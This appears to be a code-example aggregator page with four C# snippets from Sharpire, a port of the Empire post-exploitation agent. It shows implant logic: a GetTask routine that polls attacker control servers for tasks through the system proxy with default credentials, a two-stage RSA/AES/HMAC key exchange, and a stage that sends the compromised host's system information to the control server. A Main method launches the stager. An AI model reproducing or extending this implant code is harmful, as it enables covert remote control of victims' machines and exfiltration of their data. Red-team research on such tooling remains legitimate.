C# (CSharp) Sharpire SessionInfo.GetControlServers示例

示例#1

        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        internal byte[] GetTask()
        {
            byte[] results = new byte[0];
            try
            {
                byte[] routingPacket = NewRoutingPacket(null, 4);
                string routingCookie = Convert.ToBase64String(routingPacket);

                WebClient webClient = new WebClient();
                webClient.Proxy             = WebRequest.GetSystemWebProxy();
                webClient.Proxy.Credentials = CredentialCache.DefaultCredentials;
                webClient.Headers.Add("User-Agent", sessionInfo.GetUserAgent());
                webClient.Headers.Add("Cookie", "session=" + routingCookie);

                Random random          = new Random();
                string selectedTaskURI = sessionInfo.GetTaskURIs()[random.Next(0, sessionInfo.GetTaskURIs().Length)];
                results = webClient.DownloadData(sessionInfo.GetControlServers()[ServerIndex] + selectedTaskURI);
            }
            catch (WebException webException)
            {
                MissedCheckins++;
                if ((int)((HttpWebResponse)webException.Response).StatusCode == 401)
                {
                    //Restart everything
                }
            }
            return(results);
        }

示例#2

文件： Empire.Agent.Stager.cs 项目： BC-SECURITY/Sharpire

        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] Stage2(byte[] stage1response)
        {
            Random random = new Random();

            ////////////////////////////////////////////////////////////////////////////////
            byte[] decrypted       = rsaCrypto.Decrypt(stage1response, false);
            string decryptedString = Encoding.ASCII.GetString(decrypted);
            string nonce           = decryptedString.Substring(0, 16);

            sessionInfo.SetSessionKey(decryptedString.Substring(16, decryptedString.Length - 16));
            byte[] keyBytes = Encoding.ASCII.GetBytes(sessionInfo.GetSessionKey());

            ////////////////////////////////////////////////////////////////////////////////
            long increment = Convert.ToInt64(nonce);

            increment++;
            nonce = increment.ToString();
            byte[] systemInformationBytes = GetSystemInformation(nonce + "|", string.Join(",", sessionInfo.GetControlServers()));
            byte[] initializationVector   = new byte[16];
            random.NextBytes(initializationVector);
            byte[] encryptedInformationBytes = aesEncrypt(keyBytes, initializationVector, systemInformationBytes);
            encryptedInformationBytes = Misc.combine(initializationVector, encryptedInformationBytes);

            ////////////////////////////////////////////////////////////////////////////////
            using (HMACSHA256 hmac = new HMACSHA256())
            {
                hmac.Key = keyBytes;
                byte[] hmacHash = hmac.ComputeHash(encryptedInformationBytes).Take(10).ToArray();
                encryptedInformationBytes = Misc.combine(encryptedInformationBytes, hmacHash);
            }

            ////////////////////////////////////////////////////////////////////////////////
            return(SendStage(0x03, encryptedInformationBytes, "/index.php"));
        }

示例#3

        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] Stage1()
        {
            Random random = new Random();

            ////////////////////////////////////////////////////////////////////////////////
            string rsaKey = rsaCrypto.ToXmlString(false);

            byte[] rsaKeyBytes = Encoding.ASCII.GetBytes(rsaKey);

            ////////////////////////////////////////////////////////////////////////////////
            byte[] initializationVector = new byte[16];
            random.NextBytes(initializationVector);
            byte[] encryptedBytes = aesEncrypt(stagingKeyBytes, initializationVector, rsaKeyBytes);
            encryptedBytes = Misc.combine(initializationVector, encryptedBytes);

            ////////////////////////////////////////////////////////////////////////////////
            HMACSHA256 hmac = new HMACSHA256();

            hmac.Key = stagingKeyBytes;
            byte[] hmacBytes = hmac.ComputeHash(encryptedBytes);
            encryptedBytes = Misc.combine(encryptedBytes, hmacBytes.Take(10).ToArray());

            ////////////////////////////////////////////////////////////////////////////////
            return(SendStage(0x02, encryptedBytes, sessionInfo.GetControlServers().First() + "/index.jsp"));
        }

示例#4

文件： Program.cs 项目： zforks/Sharpire

        static void Main(string[] args)
        {
#if (COMMAND_LINE)
            if (args.Length < 3)
            {
                return;
            }
            SessionInfo sessionInfo = new SessionInfo(args);
#endif

#if (COMPILE_TIME)
            SessionInfo sessionInfo = new SessionInfo();
#endif

#if (PRINT)
            Console.WriteLine("EmpireServer:  {0}", sessionInfo.GetControlServers());
            Console.WriteLine("StagingKey:    {0}", sessionInfo.GetStagingKey());
            Console.WriteLine("AgentLanguage: {0}", sessionInfo.GetAgentLanguage());
#endif
            (new EmpireStager(sessionInfo)).Execute();
        }